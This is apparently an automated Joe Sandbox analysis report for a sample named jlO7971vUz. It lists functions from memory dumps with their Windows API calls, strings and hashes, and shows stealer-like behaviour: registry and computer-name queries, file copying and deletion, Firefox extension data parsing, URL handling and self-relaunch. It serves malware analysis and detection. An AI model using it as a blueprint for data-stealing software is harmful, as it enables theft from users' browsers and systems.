Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 017F5D07
HeapAlloc.KERNEL32(00000000), ref: 017F5D0E
RegOpenKeyExA.KERNEL32(80000002,013B8330,00000000,00020119,?), ref: 017F5D2E
RegQueryValueExA.KERNEL32(?,013C0BA8,00000000,00000000,000000FF,000000FF), ref: 017F5D4F
RegCloseKey.ADVAPI32(?), ref: 017F5D62

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: dc6fc8a030e8302e0b67031dfbf40110836aaef39566f5de7cab7c61b335561f
Instruction ID: d7c79b27748bcfad50d34a597e5134757f6b70b9a8c9f5e3075572d9681a173f
Opcode Fuzzy Hash: dc6fc8a030e8302e0b67031dfbf40110836aaef39566f5de7cab7c61b335561f
Instruction Fuzzy Hash: FF113DB5A44209ABD711DF94D989FBBBB78FB04711F10411DF605A6284D77459028FA1

Function 017E1260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 017E1274
HeapAlloc.KERNEL32(00000000), ref: 017E127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 017E1297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 017E12B5
RegCloseKey.ADVAPI32(?), ref: 017E12BF

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 558b9606c11b9ebba45f7fb0ee17e4fbacf4b4d47a9fbae89ec6f3c91ddec610
Instruction ID: 5e70bce532cbd63bb5d766ee9f4218bc17532370b2ed42c5b77f85342a3ff35a
Opcode Fuzzy Hash: 558b9606c11b9ebba45f7fb0ee17e4fbacf4b4d47a9fbae89ec6f3c91ddec610
Instruction Fuzzy Hash: 2E011DB9A40208BBDB10DFE4D849F9EB7BCBB48700F008158FA0997284DA749A118F50

Function 017E9980 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(013BE7B8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,017EF82D), ref: 017E999D
LoadLibraryA.KERNEL32(013C0B88,?,?,?,?,?,?,?,?,?,?,?,017EF82D), ref: 017E9A26

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F8640: lstrlen.KERNEL32(00000000,?,?,017F3D93,017FE4BB,017FE4BA,?,?,017F4A46,00000000,?,013B09B8,?,017FE988,?,00000000), ref: 017F864B
Part of subcall function 017F8640: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F86A5

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

SetEnvironmentVariableA.KERNEL32(013BE7B8,00000000,00000000,?,017FEB3C,?,017EF82D,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,017FE4D6), ref: 017E9A12

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 017E9992, 017E99A6, 017E99BC

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 252b7ee7c0ced7c894d909b4ba36ca3e55d7d4dbf27ad965aed369d57bfa60e4
Instruction ID: fdc3503e1528276a4a2881d4bfd4bf20f42d57399a99e673e107d83a2a669a67
Opcode Fuzzy Hash: 252b7ee7c0ced7c894d909b4ba36ca3e55d7d4dbf27ad965aed369d57bfa60e4
Instruction Fuzzy Hash: B2415EF9D002059BCF26EFA5E98CAAEB7F5AB18305F54801CE60597298D7705D07CF61

Function 017F4560 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 017F4593

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

ShellExecuteEx.SHELL32(0000003C), ref: 017F4656
ExitProcess.KERNEL32 ref: 017F4685

Strings

<, xrefs: 017F4609

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 70724439f2370ecf366055a4d049f2fca1cda00d6616ded97a3f75a66e8aa1ce
Instruction ID: 5134e319b64e291f5c90418f9034e4088f3e365157d9f7acbf29b3db477c8519
Opcode Fuzzy Hash: 70724439f2370ecf366055a4d049f2fca1cda00d6616ded97a3f75a66e8aa1ce
Instruction Fuzzy Hash: 173129B1D01218ABDB15EFA0DC98BDEB778AF18300F40419DE30966294DB746B49CF69

Function 017E9B50 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F6A70: GetSystemTime.KERNEL32(?,013B5F88,017FE129,?,?,?,?,?,?,?,?,?,017E4643,?,00000014), ref: 017F6A96

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 017E9BD1
lstrlen.KERNEL32(00000000), ref: 017E9F8A

Part of subcall function 017E9800: memcmp.MSVCRT ref: 017E981B
Part of subcall function 017E9800: memset.MSVCRT ref: 017E984E
Part of subcall function 017E9800: LocalAlloc.KERNEL32(00000040,?), ref: 017E989E

lstrlen.KERNEL32(00000000,00000000), ref: 017E9CCD
DeleteFileA.KERNEL32(00000000), ref: 017EA00B

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID:
API String ID: 3258613111-0
Opcode ID: 65897aa49344466e19cf6c08e3159f78454816073b8bfcc3a105a9ffd616af85
Instruction ID: bbb7732fbc83ffddada0ef7923f825f93f353d6e6aea907a458368df2434fe8a
Opcode Fuzzy Hash: 65897aa49344466e19cf6c08e3159f78454816073b8bfcc3a105a9ffd616af85
Instruction Fuzzy Hash: FCD1AC72C101199ACF15EBA4DC98EEFF378AF24300F50815DE216725A9EF346A49CB76

Function 017ECEF0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F6A70: GetSystemTime.KERNEL32(?,013B5F88,017FE129,?,?,?,?,?,?,?,?,?,017E4643,?,00000014), ref: 017F6A96

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 017ECF71
lstrlen.KERNEL32(00000000), ref: 017ED10F
lstrlen.KERNEL32(00000000), ref: 017ED123
DeleteFileA.KERNEL32(00000000), ref: 017ED19C

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 312e56fe0304d207802cdd958a4290e3ee8f97a36f8a3ca15ade2f62ac523e88
Instruction ID: bbf677f0c0e18531eddebac7667c4dea8d844ac8e53d7caa8e6102d676a41f57
Opcode Fuzzy Hash: 312e56fe0304d207802cdd958a4290e3ee8f97a36f8a3ca15ade2f62ac523e88
Instruction Fuzzy Hash: 3881FE729101099BCF15FBA4DC98EEFF378AF24300F50416CE21666299EF746A09CB67

Function 017EEBD0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017E93EC
Part of subcall function 017E93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 017E9411
Part of subcall function 017E93C0: LocalAlloc.KERNEL32(00000040,?), ref: 017E9431
Part of subcall function 017E93C0: ReadFile.KERNEL32(000000FF,?,00000000,017EF9B7,00000000), ref: 017E945A
Part of subcall function 017E93C0: LocalFree.KERNEL32(017EF9B7), ref: 017E9490
Part of subcall function 017E93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 017E949A

Part of subcall function 017F6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 017F6D62

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,017FEDD0,017FE766), ref: 017EEC7C
lstrlen.KERNEL32(00000000), ref: 017EEC9B

Strings

moz-extension+++, xrefs: 017EECDD
^userContextId=4294967295, xrefs: 017EECCC

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$ChangeCloseCreateFindFreeNotificationReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2768692033-3310892237
Opcode ID: d70982784191a9d0bd3b4e2196b6e5749c8bf5e12d60e573ee4c74f0dc684a29
Instruction ID: afa315cd0179f08163a59b9d7b5f4df6c82ee8b6716567c7a965ef1845d927bd
Opcode Fuzzy Hash: d70982784191a9d0bd3b4e2196b6e5749c8bf5e12d60e573ee4c74f0dc684a29
Instruction Fuzzy Hash: 90510D729101099ACF14FFB4D8999EFF379AF64300F50852CE61667698EF346A08CB63

Function 017F4A23 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013B09B8,?,017FE988,?,00000000,?,017FE98C,?,00000000,017FE4C7), ref: 017F49FA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 017F4A18
CloseHandle.KERNEL32(00000000), ref: 017F4A29
Sleep.KERNEL32(00001770), ref: 017F4A34
CloseHandle.KERNEL32(?,00000000,?,013B09B8,?,017FE988,?,00000000,?,017FE98C,?,00000000,017FE4C7), ref: 017F4A4A
ExitProcess.KERNEL32 ref: 017F4A52

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 3fb7192d06637d46d4f904ef5639aa08d9430d8d3ca6462d16cbe30284231f46
Instruction ID: 05c629d2117681ae7d5df4c3190500dbfd50919592f0d843933ad671dc236f1b
Opcode Fuzzy Hash: 3fb7192d06637d46d4f904ef5639aa08d9430d8d3ca6462d16cbe30284231f46
Instruction Fuzzy Hash: 78F05E74984206EFEB11ABA0DC09B7FB674BF14701F10445CA713A52C4EFB05606CB69

Function 017E4490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 017F6800: malloc.MSVCRT ref: 017F6808

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 017E4516
InternetCrackUrlA.WININET(00000000,00000000), ref: 017E4526

Strings

<, xrefs: 017E44A9

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 600b2f2d83cd286a9c1bc57edd00ef13c337ad347e4ff12bc1d00c52f6f1c74b
Instruction ID: 21c44a5d7e5637ac5827d9ba8657e8f2fc37b57dd659c01b83325894bb37acad
Opcode Fuzzy Hash: 600b2f2d83cd286a9c1bc57edd00ef13c337ad347e4ff12bc1d00c52f6f1c74b
Instruction Fuzzy Hash: A32112B5D40209ABDF14EF94E849ADEB774AF54310F104229E625B73C4EB706606CB91

Function 017EFE10 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,013BE6F8), ref: 017EFE5E
StrCmpCA.SHLWAPI(00000000,013BE818), ref: 017EFF0C
StrCmpCA.SHLWAPI(00000000,013BE7C8), ref: 017F0025

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: ef6b204e9008f148c0c167390b8a9983bbc6beaeec3e507981e5a409a83dadea
Instruction ID: e55fcb267cdb6d971a07930b86cc41812ca511d870f5ce31ae98716744e90941
Opcode Fuzzy Hash: ef6b204e9008f148c0c167390b8a9983bbc6beaeec3e507981e5a409a83dadea
Instruction Fuzzy Hash: AC816775A101059BCF08EF74D9999AEF7F9BF94300F10816DE9168B359EB30DA05CB91

Function 017EFE2F Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,013BE6F8), ref: 017EFE5E
StrCmpCA.SHLWAPI(00000000,013BE818), ref: 017EFF0C
StrCmpCA.SHLWAPI(00000000,013BE7C8), ref: 017F0025

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 036624f966d73bfc563419b08eef6447d907d2600aa950bb177935068bbad36b
Instruction ID: c558c2e10b15b9c5a4430f8c612e296c8c371fd5292b7bf57e11619e78d66815
Opcode Fuzzy Hash: 036624f966d73bfc563419b08eef6447d907d2600aa950bb177935068bbad36b
Instruction Fuzzy Hash: 50816475A10205DFCF08EF64D5999AEF7F9BF94300B10816DE8169B359EB30EA05CB91

Function 00B36160 Relevance: 4.6, APIs: 3, Instructions: 102COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B36200
memmove.MSVCRT ref: 00B3620F

Part of subcall function 00B3860D: malloc.MSVCRT ref: 00B38622

Concurrency::cancel_current_task.LIBCPMT ref: 00B36269

Memory Dump Source

Source File: 00000000.00000002.2242638566.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2242043905.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242900451.0000000000B42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242930147.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000B4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_jlO7971vUz.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocmemmovememset
String ID:
API String ID: 2220502945-0
Opcode ID: 16b70cb043b049196e7a7ef086d11e896540f89af67cd2b6ddb1774ad2383a0b
Instruction ID: 8f0f995744141052192c38ce34d7b25b039e0cc9481ace0206458f047310f062
Opcode Fuzzy Hash: 16b70cb043b049196e7a7ef086d11e896540f89af67cd2b6ddb1774ad2383a0b
Instruction Fuzzy Hash: C931D472600500AFCB15DE78CDD592EBBE99B88310F3583A9E815DB38ADA30ED458791

Function 017F57B0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017F495B), ref: 017F57E0
HeapAlloc.KERNEL32(00000000,?,?,?,017F495B), ref: 017F57E7
GetComputerNameA.KERNEL32(?,00000104), ref: 017F57FF

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: ad36d8bfb8938b37663dacf7731d264da87c8e037151b898f9381ecbdcc20459
Instruction ID: b7d9cbbe4105e25cc5cb079e7e35d346d893d3a6b0f70a9c49e052088d42e1a9
Opcode Fuzzy Hash: ad36d8bfb8938b37663dacf7731d264da87c8e037151b898f9381ecbdcc20459
Instruction Fuzzy Hash: BB016DB1A84209ABCB20CF99D945BABFBB8FB04725F10412DF60AE3380C77459058BA1

Function 6C433060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C433095

Part of subcall function 6C4335A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C4BF688,00001000), ref: 6C4335D5
Part of subcall function 6C4335A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4335E0
Part of subcall function 6C4335A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C4335FD
Part of subcall function 6C4335A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C43363F
Part of subcall function 6C4335A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C43369F
Part of subcall function 6C4335A0: __aulldiv.LIBCMT ref: 6C4336E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C43309F

Part of subcall function 6C455B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4556EE,?,00000001), ref: 6C455B85
Part of subcall function 6C455B50: EnterCriticalSection.KERNEL32(6C4BF688,?,?,?,6C4556EE,?,00000001), ref: 6C455B90
Part of subcall function 6C455B50: LeaveCriticalSection.KERNEL32(6C4BF688,?,?,?,6C4556EE,?,00000001), ref: 6C455BD8
Part of subcall function 6C455B50: GetTickCount64.KERNEL32 ref: 6C455BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C4330BE

